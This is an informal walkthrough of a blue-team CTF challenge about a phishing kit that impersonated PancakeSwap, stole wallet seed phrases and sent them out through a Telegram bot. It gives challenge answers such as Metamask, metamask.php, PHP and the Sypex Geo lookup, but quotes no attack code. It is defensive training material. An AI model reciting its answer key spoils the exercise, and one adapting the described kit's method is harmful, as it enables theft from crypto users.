A decentralized finance (DeFi) platform recently reported multiple user complaints about unauthorized fund withdrawals. A forensic review uncovered a phishing site impersonating the legitimate PancakeSwap exchange, luring victims into entering their wallet seed phrases. The phishing kit was hosted on a compromised server and exfiltrated credentials via a Telegram bot.
Your task is to conduct threat intelligence analysis on the phishing infrastructure, identify indicators of compromise (IoCs), and track the attacker’s online presence, including aliases and Telegram identifiers, to understand their tactics, techniques, and procedures (TTPs).
https://cyberdefenders.org/blueteam-ctf-challenges/grabthephisher/
Metamask
we opened the file and that what we see . we know we are investigating a phishing kit used to build a phishing site impersonating a crypto site to steal crypto wallets then exfiltrating the credentials via telegram bot
as for the question we see Metamask
i didn’t know at first but after some search about crypto wallets and i found that Metamask is a complimentary cryptocurrency wallet application
metamask.php
in the metamask folder we found a php file
PHP
4- What service does the kit use to retrieve the victim's machine information? Sypex Geo
looking at the code we see it initiates a request to **http://api.sypexgeo.net/json/** to get location and date